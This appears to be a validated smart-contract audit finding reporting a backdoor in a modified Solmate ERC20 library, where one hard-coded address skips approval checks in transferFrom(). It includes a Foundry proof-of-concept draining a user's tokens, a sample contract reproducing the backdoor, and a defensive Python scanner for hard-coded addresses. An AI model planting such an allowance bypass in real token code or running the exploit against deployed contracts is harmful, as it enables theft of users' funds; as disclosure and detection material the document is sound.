Severity: high
Valid

Malicious implementation of `transferFrom()`

Summary

Address `0x815F577F1c1bcE213c012f166744937C889DAF17` has been given the power to steal anyone's Santa Tokens through `transferFrom()`.

Vulnerability Details

The following PoC shows the exploit:

```solidity
function test_t0x1c_transfer() public {
    // let's assume a user has some santa tokens
    deal(address(santaToken), user, 100e18);
    assertEq(santaToken.balanceOf(user), 100e18);

    // attack: `user` never calls approve(), yet the transfer succeeds
    address attacker = address(0x815F577F1c1bcE213c012f166744937C889DAF17);
    vm.startPrank(attacker);
    santaToken.transferFrom(user, attacker, 100e18);
    assertEq(santaToken.balanceOf(user), 0);
    assertEq(santaToken.balanceOf(attacker), 100e18);
    vm.stopPrank();
}
```

Impact

Nobody's funds (Santa Tokens) are safe, as no approval step is required for this attack vector.

Tools Used

Foundry

Recommendations

Use the standard version of Solmate from https://github.com/transmissions11/solmate/blob/main/src/tokens/ERC20.sol
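
A review-time check that complements this recommendation, added here as an example (it is not part of the original submission or of Solmate): it flags 20-byte address literals hard-coded in vendored Solidity sources and marks those inside token-moving functions. The function names, the `SENSITIVE` set and the sample contract are assumptions; the sample is constructed from the finding's description and is not the real library source.

```python
import re

# Constructed sample modelled on the finding's description (not the real library source).
SAMPLE = '''\
contract ERC20 {
    function approve(address spender, uint256 amount) public returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }
    // 0x1111111111111111111111111111111111111111 in a comment is ignored
    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        if (msg.sender != 0x815F577F1c1bcE213c012f166744937C889DAF17) {
            allowance[from][msg.sender] -= amount;
        }
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}
'''

ADDRESS = re.compile(r'\b0x[0-9a-fA-F]{40}\b')       # exactly 20 bytes, so bytes32 is skipped
FUNCTION = re.compile(r'\bfunction\s+(\w+)')
COMMENT = re.compile(r'//[^\n]*|/\*.*?\*/', re.S)
SENSITIVE = {"transfer", "transferFrom", "approve", "permit", "_mint", "_burn"}

def strip_comments(src):
    # Keep the newlines of block comments so reported line numbers stay correct.
    return COMMENT.sub(lambda m: '\n' * m.group().count('\n'), src)

def find_hardcoded_addresses(src, allowlist=()):
    """Return (line, function, address, in_sensitive_function) per literal found.

    Heuristic: the enclosing function is the last `function` keyword seen,
    which is good enough to prioritise a manual review of the dependency.
    """
    allowed = {a.lower() for a in allowlist}
    findings, current = [], None
    for line_no, line in enumerate(strip_comments(src).splitlines(), 1):
        match = FUNCTION.search(line)
        if match:
            current = match.group(1)
        for addr in ADDRESS.findall(line):
            if addr.lower() not in allowed:
                findings.append((line_no, current, addr, current in SENSITIVE))
    return findings

if __name__ == "__main__":
    for line_no, func, addr, sensitive in find_hardcoded_addresses(SAMPLE):
        print(f"line {line_no}: {addr} in {func}() {'[REVIEW]' if sensitive else ''}")
```

Run over every `.sol` file under a project's dependency directory, any hit in a library that should contain no deployment-specific addresses is a reason to diff that file against upstream.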

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
